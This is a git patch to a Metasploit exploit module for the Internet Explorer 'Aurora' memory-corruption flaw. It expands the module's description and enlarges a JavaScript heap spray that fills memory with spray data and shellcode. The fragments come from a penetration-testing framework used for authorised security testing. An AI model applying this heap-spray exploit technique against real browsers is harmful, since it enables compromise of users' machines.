From 69f609bdcd4ecccdf8fdb3635599a5294da9cbaa Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Sat, 16 Jan 2010 00:55:42 +0000
Subject: [PATCH] Updated description to make the source of the exploit clear and why it only triggers reliably vs 6 now. Adjusts the heap spray to be slightly bigger
git-svn-id: file:///home/svn/framework3/trunk@8138 4d416f70-5f16-0410-b530-b9f4589650da
---
 modules/exploits/windows/browser/ie_aurora.rb | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/browser/ie_aurora.rb b/modules/exploits/windows/browser/ie_aurora.rb
index 080799110f..b435297dd5 100644
--- a/modules/exploits/windows/browser/ie_aurora.rb
+++ b/modules/exploits/windows/browser/ie_aurora.rb
@@ -31,7 +31,11 @@ class Metasploit3 < Msf::Exploit::Remote
 'Name' => 'Microsoft Internet Explorer "Aurora" Memory Corruption',
 'Description' => %q{
 This module exploits a memory corruption flaw in Internet Explorer. This
- flaw was found in the wild.
+ flaw was found in the wild and was a key component of the "Operation Aurora"
+ attacks that lead to the compromise of a number of high profile companies. The
+ exploit code is a direct port of the public sample published to the Wepawet
+ malware analysis site. The technique used by this module is currently identical
+ to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
 },
 'License' => MSF_LICENSE,
 'Author' =>
@@ -125,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
 do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
- for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
+ for(#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
 }
 function #{var_ev1}(evt){